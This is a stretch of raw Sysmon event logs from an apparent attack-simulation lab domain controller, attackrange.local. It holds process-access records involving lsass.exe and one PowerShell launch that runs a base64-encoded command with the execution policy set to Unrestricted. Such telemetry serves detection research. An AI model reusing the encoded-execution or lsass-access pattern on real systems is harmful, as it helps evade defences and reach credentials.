08:42:01.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002766Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002765Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002764Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002763Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002762Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002761Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002760Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002759Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.167{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16D9-5F84-8300-000000007F01}1012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002758Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.167{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002757Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.167{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002756Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.167{5D479F2C-16D9-5F84-8200-000000007F01}43204328C:\Windows\system32\cmd.exe{5D479F2C-16D9-5F84-8300-000000007F01}1012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002755Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.169{5D479F2C-16D9-5F84-8300-000000007F01}1012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-16D9-5F84-91E5-040000000000}0x4e5910HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-16D9-5F84-8200-000000007F01}4320C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000002754Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002753Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-16D9-5F84-8100-000000007F01}42644268C:\Windows\system32\conhost.exe{5D479F2C-16D9-5F84-8200-000000007F01}4320C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002752Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002751Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.151{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002750Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 